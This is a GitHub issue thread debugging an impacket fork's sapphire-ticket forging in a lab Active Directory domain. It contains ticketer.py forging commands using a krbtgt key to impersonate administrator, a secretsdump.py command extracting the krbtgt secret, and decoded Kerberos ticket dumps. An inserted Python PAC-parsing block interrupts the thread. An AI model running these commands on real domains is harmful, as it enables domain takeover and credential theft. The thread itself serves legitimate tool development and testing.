Ticketer Sapphire ticket issue #1605

Closed
Cyb3rGh0st786 opened this issue Sep 6, 2023 · 13 comments · Fixed by ThePorgs/impacket#41
Comments


Cyb3rGh0st786 commented Sep 6, 2023

Configuration

impacket version: 0.10.1.dev1+20230828.161954.3f48a55e
Python version: 3.11.4
Target OS: Kali Linux

I tried to create a sapphire ticket using ticketer.py. The ccache file has been created, but when I try to use it with wmiexec.py or secretsdump.py, I get an error saying TGT revoked

Ticketer command

ticketer.py -request -impersonate 'administrator' -domain 'adlab.com' -user 'normaldomainuser' -mypassword' -aesKey 'Krgtgtaeskey' -domain-sid 'S-1-5-21-991381806-4095455566-2546632930' -dc-ip 192.168.126.200 'administrator' -debug

Debug info attached

Debug info.txt

Export the cache file

export KRB5CCNAME=~/Desktop/tools/impacket-theporgs/administrator.ccache

Secretsdump

secretsdump.py adlab.com/administrator@192.168.126.200 -dc-ip 192.168.126.200 -just-dc-user krbtgt -k -no-pass -debug

Describe the ticket

┌──(kali㉿kali)-[~/Desktop/tools/impacket-theporgs/examples]
└─$ describeTicket.py ../administrator.ccache -d adlab.com -u administrator -debug --aes krbtgtaeskey
Impacket for Exegol - v0.10.1.dev1+20230828.161954.3f48a55e - Copyright 2022 Fortra - forked by ThePorgs

[+] Impacket Library Installation Path: /usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230828.161954.3f48a55e-py3.11.egg/impacket
[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key            : 764c6d756b487769634f637845587861784553466a67727a4172507569426b44
[*] User Name                     : administrator
[*] User Realm                    : ADLAB.COM
[*] Service Name                  : krbtgt/ADLAB.COM
[*] Service Realm                 : ADLAB.COM
[*] Start Time                    : 06/09/2023 12:41:00 PM
[*] End Time                      : 06/09/2023 22:41:00 PM
[*] RenewTill                     : 07/09/2023 12:41:00 PM
[*] Flags                         : (0x50e50000) forwardable, proxiable, renewable, initial, pre_authent, ok_as_delegate, enc_pa_rep
[*] KeyType                       : aes256_cts_hmac_sha1_96
[*] Base64(key)                   : dkxtdWtId2ljT2N4RVh4YXhFU0ZqZ3J6QXJQdWlCa0Q=
[*] Decoding unencrypted data in credential[0]['ticket']:
[*]   Service Name                : krbtgt/adlab.com
[*]   Service Realm               : ADLAB.COM
[*]   Encryption type             : aes256_cts_hmac_sha1_96 (etype 18)
[+] Handling Kerberos keys
[+] No password (-p/--password or -hp/--hex_pass supplied, skipping Kerberos keys calculation
[+] Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18)
[+] Using corresponding key: Mykrbtgtaeskey
[+] Ticket successfully decrypted
[*] Decoding credential[0]['ticket']['enc-part']:
[*]   LoginInfo                   
[*]     Logon Time                : 06/09/2023 05:50:04 AM
[*]     Logoff Time               : Infinity (absolute time)
[*]     Kickoff Time              : Infinity (absolute time)
[*]     Password Last Set         : 01/09/2023 03:15:28 AM
[*]     Password Can Change       : 02/09/2023 03:15:28 AM
[*]     Password Must Change      : Infinity (absolute time)
[*]     LastSuccessfulILogon      : Infinity (absolute time)
[*]     LastFailedILogon          : Infinity (absolute time)
[*]     FailedILogonCount         : 0
[*]     Account Name              : Administrator
[*]     Full Name                 : 
[*]     Logon Script              : 
[*]     Profile Path              : 
[*]     Home Dir                  : 
[*]     Dir Drive                 : 
[*]     Logon Count               : 443
[*]     Bad Password Count        : 0
[*]     User RID                  : 500
[*]     Group RID                 : 513
[*]     Group Count               : 5
[*]     Groups                    : 520, 512, 513, 519, 518
[*]     Groups (decoded)          : (520) Group Policy Creator Owners
[*]                                 (512) Domain Admins
[*]                                 (513) Domain Users
[*]                                 (519) Enterprise Admins
[*]                                 (518) Schema Admins
[*]     User Flags                : (544) LOGON_EXTRA_SIDS, LOGON_RESOURCE_GROUPS
[*]     User Session Key          : 00000000000000000000000000000000
[*]     Logon Server              : WIN-3MBDJTT1P21
[*]     Logon Domain Name         : ADLAB
[*]     Logon Domain SID          : S-1-5-21-991381806-4095455566-2546632930
[*]     User Account Control      : (528) USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD
[*]     Extra SID Count           : 1
[*]     Extra SIDs                : S-1-18-2 Service asserted identity (SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED)
[*]     Resource Group Domain SID : S-1-5-21-991381806-4095455566-2546632930
[*]     Resource Group Count      : 1
[*]     Resource Group Ids        : 572
[*]     LMKey                     : 0000000000000000
[*]     SubAuthStatus             : 0
[*]     Reserved3                 : 0
[*]   ClientName                  
[*]     Client Id                 : 06/09/2023 08:41:00 AM
[*]     Client Name               : administrator
[*]   UpnDns                      
[*]     Flags                     : (3) U_UsernameOnly, S_SidSamSupplied
[*]     UPN                       : Administrator@adlab.com
[*]     DNS Domain Name           : ADLAB.COM
[*]     SamAccountName            : Administrator
[*]     UserSid                   : S-1-5-21-991381806-4095455566-2546632930-500
[*]   ServerChecksum              
[*]     Signature Type            : hmac_sha1_96_aes256
[*]     Signature                 : 4a90cb2ccd5af0c688a1e872
[*]   KDCChecksum                 
[*]     Signature Type            : hmac_sha1_96_aes256
[*]     Signature                 : 60f68b1fa5ffbfae4317db95

@Cyb3rGh0st786
Author

@ShutdownRepo FYI

@ShutdownRepo
Contributor

The PAC_ATTRIBUTES_INFO and PAC_REQUESTOR_INFO structures seem to be missing from your ticket; it's probably the cause of your error, as per #1390 and #1545.
But the changes have been merged, I don't know why you don't have those new structures in your PAC.
If you're able to obtain a ticket for normaldomainuser and describe it to see if the structures are in his ticket, it'd be awesome.

@Cyb3rGh0st786
Author

@ShutdownRepo ,
Here is what I have done and userone is my normal domain user account, and I have tried to impersonate this user
ticketer.py -request -impersonate 'userone' -domain 'adlab.com' -user 'userone' -password 'mypassword' -aesKey 'mykrbtgtaeskey' -domain-sid 'S-1-5-21-991381806-4095455566-2546632930' -dc-ip 192.168.126.200 'userone' -debug

debuginfo-userone.txt

describe ticket

describeTicket.py ./userone.ccache -u "userone" --aes "krbtgtaeskey" -d adlab.com

Impacket for Exegol - v0.10.1.dev1+20230828.161954.3f48a55e - Copyright 2022 Fortra - forked by ThePorgs

[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key            : 665274625a666351596166594e5375694c666a766e76724958464466786e5377
[*] User Name                     : userone
[*] User Realm                    : ADLAB.COM
[*] Service Name                  : krbtgt/ADLAB.COM
[*] Service Realm                 : ADLAB.COM
[*] Start Time                    : 06/09/2023 15:28:57 PM
[*] End Time                      : 07/09/2023 01:28:57 AM
[*] RenewTill                     : 07/09/2023 15:28:57 PM
[*] Flags                         : (0x50e50000) forwardable, proxiable, renewable, initial, pre_authent, ok_as_delegate, enc_pa_rep
[*] KeyType                       : aes256_cts_hmac_sha1_96
[*] Base64(key)                   : ZlJ0YlpmY1FZYWZZTlN1aUxmanZudnJJWEZEZnhuU3c=
[*] Decoding unencrypted data in credential[0]['ticket']:
[*]   Service Name                : krbtgt/adlab.com
[*]   Service Realm               : ADLAB.COM
[*]   Encryption type             : aes256_cts_hmac_sha1_96 (etype 18)
[*] Decoding credential[0]['ticket']['enc-part']:
[*]   LoginInfo                   
[*]     Logon Time                : 06/09/2023 11:28:57 AM
[*]     Logoff Time               : Infinity (absolute time)
[*]     Kickoff Time              : Infinity (absolute time)
[*]     Password Last Set         : 10/04/2023 04:10:22 AM
[*]     Password Can Change       : 11/04/2023 04:10:22 AM
[*]     Password Must Change      : Infinity (absolute time)
[*]     LastSuccessfulILogon      : Infinity (absolute time)
[*]     LastFailedILogon          : Infinity (absolute time)
[*]     FailedILogonCount         : 0
[*]     Account Name              : userone
[*]     Full Name                 : user one
[*]     Logon Script              : 
[*]     Profile Path              : 
[*]     Home Dir                  : 
[*]     Dir Drive                 : 
[*]     Logon Count               : 426
[*]     Bad Password Count        : 0
[*]     User RID                  : 1103
[*]     Group RID                 : 513
[*]     Group Count               : 1
[*]     Groups                    : 513
[*]     Groups (decoded)          : (513) Domain Users
[*]     User Flags                : (32) LOGON_EXTRA_SIDS
[*]     User Session Key          : 00000000000000000000000000000000
[*]     Logon Server              : WIN-3MBDJTT1P21
[*]     Logon Domain Name         : ADLAB
[*]     Logon Domain SID          : S-1-5-21-991381806-4095455566-2546632930
[*]     User Account Control      : (8720) USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD, USER_TRUSTED_FOR_DELEGATION
[*]     Extra SID Count           : 1
[*]     Extra SIDs                : S-1-18-2 Service asserted identity (SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED)
[*]     Resource Group Domain SID :
[*]     Resource Group Count      : 0
[*]     Resource Group Ids        : 
[*]     LMKey                     : 0000000000000000
[*]     SubAuthStatus             : 0
[*]     Reserved3                 : 0
[*]   ClientName                  
[*]     Client Id                 : 06/09/2023 11:28:57 AM
[*]     Client Name               : userone
[*]   UpnDns                      
[*]     Flags                     : (2) S_SidSamSupplied
[*]     UPN                       : userone@adlab.com
[*]     DNS Domain Name           : ADLAB.COM
[*]     SamAccountName            : userone
[*]     UserSid                   : S-1-5-21-991381806-4095455566-2546632930-1103
[*]   ServerChecksum              
[*]     Signature Type            : hmac_sha1_96_aes256
[*]     Signature                 : 323030dcfb8e1b872bc06989
[*]   KDCChecksum                 
[*]     Signature Type            : hmac_sha1_96_aes256
[*]     Signature                 : f6da234e225e7febd9b55788

Please let me know if you need any further details and testing

@ShutdownRepo
Contributor

I'd need the regular TGT for userone
Something you'd get with getTGT

@Cyb3rGh0st786
Author

@ShutdownRepo ,

Here you go

Impacket for Exegol - v0.10.1.dev1+20230828.161954.3f48a55e - Copyright 2022 Fortra - forked by ThePorgs

[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key            : ec72f38ed852119ac094cc0a33190dcfe7a0d1e709a97b6b5e5f70a3e7aad346
[*] User Name                     : userone
[*] User Realm                    : ADLAB.COM
[*] Service Name                  : krbtgt/adlab.com
[*] Service Realm                 : ADLAB.COM
[*] Start Time                    : 06/09/2023 21:40:31 PM
[*] End Time                      : 07/09/2023 07:40:31 AM
[*] RenewTill                     : 07/09/2023 21:40:32 PM
[*] Flags                         : (0x50e10000) forwardable, proxiable, renewable, initial, pre_authent, enc_pa_rep
[*] KeyType                       : aes256_cts_hmac_sha1_96
[*] Base64(key)                   : 7HLzjthSEZrAlMwKMxkNz+eg0ecJqXtrXl9wo+eq00Y=
[*] Decoding unencrypted data in credential[0]['ticket']:
[*]   Service Name                : krbtgt/adlab.com
[*]   Service Realm               : ADLAB.COM
[*]   Encryption type             : aes256_cts_hmac_sha1_96 (etype 18)
[*] Decoding credential[0]['ticket']['enc-part']:
[*]   LoginInfo                   
[*]     Logon Time                : 06/09/2023 17:36:37 PM
[*]     Logoff Time               : Infinity (absolute time)
[*]     Kickoff Time              : Infinity (absolute time)
[*]     Password Last Set         : 06/09/2023 17:40:02 PM
[*]     Password Can Change       : 07/09/2023 17:40:02 PM
[*]     Password Must Change      : Infinity (absolute time)
[*]     LastSuccessfulILogon      : Infinity (absolute time)
[*]     LastFailedILogon          : Infinity (absolute time)
[*]     FailedILogonCount         : 0
[*]     Account Name              : userone
[*]     Full Name                 : user one
[*]     Logon Script              : 
[*]     Profile Path              : 
[*]     Home Dir                  : 
[*]     Dir Drive                 : 
[*]     Logon Count               : 428
[*]     Bad Password Count        : 1
[*]     User RID                  : 1103
[*]     Group RID                 : 513
[*]     Group Count               : 1
[*]     Groups                    : 513
[*]     Groups (decoded)          : (513) Domain Users
[*]     User Flags                : (32) LOGON_EXTRA_SIDS
[*]     User Session Key          : 00000000000000000000000000000000
[*]     Logon Server              : WIN-3MBDJTT1P21
[*]     Logon Domain Name         : ADLAB
[*]     Logon Domain SID          : S-1-5-21-991381806-4095455566-2546632930
[*]     User Account Control      : (8720) USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD, USER_TRUSTED_FOR_DELEGATION
[*]     Extra SID Count           : 1
[*]     Extra SIDs                : S-1-18-1 Authentication authority asserted identity (SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED)
[*]     Resource Group Domain SID :
[*]     Resource Group Count      : 0
[*]     Resource Group Ids        : 
[*]     LMKey                     : 0000000000000000
[*]     SubAuthStatus             : 0
[*]     Reserved3                 : 0
[*]   ServerChecksum              
[*]     Signature Type            : hmac_sha1_96_aes256
[*]     Signature                 : 493b020c12ca0ee59a8ca947
[*]   KDCChecksum                 
[*]     Signature Type            : hmac_sha1_96_aes256
[*]     Signature                 : 06a9f66bc1ec98cfc43d1f4e
[*]   ClientName                  
[*]     Client Id                 : 06/09/2023 17:40:31 PM
[*]     Client Name               : userone
[*]   UpnDns                      
[*]     Flags                     : (2) S_SidSamSupplied
[*]     UPN                       : userone@adlab.com
[*]     DNS Domain Name           : ADLAB.COM
[*]     SamAccountName            : userone
[*]     UserSid                   : S-1-5-21-991381806-4095455566-2546632930-1103
[*]   Attributes Info             
[*]     Flags                     : (1) PAC_WAS_REQUESTED
[*]   Requestor Info              
[*]     UserSid                   : S-1-5-21-991381806-4095455566-2546632930-1103

Cyb3rGh0st786 commented Sep 6, 2023

userone.ccache.zip
I added the ccache file also, which I got from getTGT, for your reference. Remove the .zip extension.

@ShutdownRepo
Contributor

That's what I thought: structures PAC_ATTRIBUTES_INFO and PAC_REQUESTOR are in the original userone's TGT and are not in the ticket produced with ticketer for some reason, which indicates that the issue is probably located around here

```python
if PAC_ATTRIBUTES_INFO in pacInfos:
    pac_count += 1
    pacAttributesInfoBlob = pacInfos[PAC_ATTRIBUTES_INFO]
    pacAttributesInfoAlignment = b'\x00' * self.getPadLength(len(pacAttributesInfoBlob))
pacRequestorInfoBlob = None
pacRequestorInfoAlignment = None
if PAC_REQUESTOR_INFO in pacInfos:
    pac_count += 1
    pacRequestorInfoBlob = pacInfos[PAC_REQUESTOR_INFO]
    pacRequestorInfoAlignment = b'\x00' * self.getPadLength(len(pacRequestorInfoBlob))
```

I won't be able to debug that just yet; would you be able to try debugging and find out where the problem is happening?

Cyb3rGh0st786 commented Sep 7, 2023

Sure, I will give it a try

@ShutdownRepo
Contributor

So, from the tests we made together with @kaleemshaik7867 today, what's happening is that Sapphire Ticket takes an initial ticket's PAC and "copies" it into a new one. The initial ticket is obtained through S4U2self + U2U.
This initial PAC is missing the two PAC blobs PAC_ATTRIBUTES_INFO and PAC_REQUESTOR; that's why they are missing from the final ticket.
If we obtain the initial ticket manually (getTGT user1, getST -u2u -self -impersonate user2) the result is the same.
Nota bene: user1's TGT is not missing the two structures, meaning the structures go missing in the getST process.
This means that there is either an issue in how the ticket is requested through getST with S4U2self+U2U (a flag missing for instance, or anything that tells the DCs not to include the new structures), or there is a problem with the environment (the DC fails to produce a service ticket with the new structures, which is unlikely).
Next step: understand what's wrong with the ST request.
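As an added illustration of the check this thread converges on (a PAC copied from the S4U2self+U2U service ticket lacks the PAC_ATTRIBUTES_INFO and PAC_REQUESTOR buffers that the TGT carries), here is a small MS-PAC header parser that reports which buffer types are present. This is example code, not impacket's or the issue author's; the PAC bytes it builds are constructed placeholders and only the PACTYPE / PAC_INFO_BUFFER layout is real.

```python
"""Added example: list the buffers an MS-PAC blob carries.

Buffer payloads below are constructed placeholders; only the PACTYPE and
PAC_INFO_BUFFER header layout (MS-PAC 2.3 / 2.4) is real. Not impacket code.
"""
import struct

# ulType values from MS-PAC; 17 and 18 are the two the thread found missing.
PAC_LOGON_INFO, PAC_SERVER_CHECKSUM, PAC_PRIVSVR_CHECKSUM = 1, 6, 7
PAC_CLIENT_INFO_TYPE, PAC_UPN_DNS_INFO = 10, 12
PAC_ATTRIBUTES_INFO, PAC_REQUESTOR = 17, 18
REQUIRED_SINCE_KB5008380 = (PAC_ATTRIBUTES_INFO, PAC_REQUESTOR)


def pad8(n):
    """PAC buffers start on 8-byte boundaries."""
    return (-n) % 8


def build_pac(blobs):
    """Serialize (ulType, payload) pairs as a PACTYPE structure (constructed data)."""
    offset = 8 + 16 * len(blobs)   # cBuffers + Version, then one 16-byte entry per buffer
    entries, body = b"", b""
    for ul_type, blob in blobs:
        entries += struct.pack("<IIQ", ul_type, len(blob), offset)
        body += blob + b"\x00" * pad8(len(blob))
        offset += len(blob) + pad8(len(blob))
    return struct.pack("<II", len(blobs), 0) + entries + body


def parse_pac(raw):
    """Return {ulType: payload} from a PACTYPE blob, bounds-checking every entry."""
    if len(raw) < 8:
        raise ValueError("shorter than a PACTYPE header")
    c_buffers, version = struct.unpack_from("<II", raw, 0)
    if version != 0 or 8 + 16 * c_buffers > len(raw):
        raise ValueError("bad PACTYPE header")
    buffers = {}
    for i in range(c_buffers):
        ul_type, size, offset = struct.unpack_from("<IIQ", raw, 8 + 16 * i)
        if offset + size > len(raw):
            raise ValueError("buffer type %d points outside the PAC" % ul_type)
        buffers[ul_type] = raw[offset:offset + size]
    return buffers


def missing_post_kb5008380_buffers(raw):
    """Buffer types an enforcing KDC expects that this PAC does not carry."""
    return [t for t in REQUIRED_SINCE_KB5008380 if t not in parse_pac(raw)]


# Constructed samples: the user's real TGT carries 17 and 18; the PAC copied
# out of the S4U2self+U2U service ticket in the thread does not.
_BASE = [(PAC_LOGON_INFO, b"\x01" * 40), (PAC_CLIENT_INFO_TYPE, b"\x02" * 12),
         (PAC_UPN_DNS_INFO, b"\x03" * 20), (PAC_SERVER_CHECKSUM, b"\x00" * 16),
         (PAC_PRIVSVR_CHECKSUM, b"\x00" * 16)]
TGT_PAC = build_pac(_BASE + [(PAC_ATTRIBUTES_INFO, struct.pack("<II", 1, 1)),
                             (PAC_REQUESTOR, b"\x05" * 28)])
COPIED_PAC = build_pac(_BASE)
```

Running `missing_post_kb5008380_buffers` over a ticket's decrypted PAC gives the same yes/no answer describeTicket shows by listing (or not listing) Attributes Info and Requestor Info.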

ShutdownRepo commented Sep 8, 2023

Additional testing indicates that the structures go missing after a regular ST request with getST.py, so if something's wrong with getST.py, it's not only with S4U2self + U2U. Maybe those structures are meant to go away in a service ticket, which I don't think is the reason because afaik, a TGT's PAC is copy-pasted in a service ticket when a user asks for an ST 🤷

@ShutdownRepo
Contributor

This issue can be closed. I figured it out and pushed fixes. Enforced KB5008380 was the root cause.

@Cyb3rGh0st786
Author

Thank you, @ShutdownRepo, for your exceptional support in closing the issue.

@ShutdownRepo
Contributor

Glad we sorted it out, thank you for the great help

anadrianmanrique pushed a commit that referenced this issue Oct 4, 2023
* Adding -impersonate flag to ingest S4U2self+U2U TGT

* Functional version

* Commenting out duration customization for sapphire

* Fixes #1605

* Adding AD_IF_RELEVANT reference

* Fixing undefined tgt session key and wrong cname for impersonation

* Adding missing and ignored params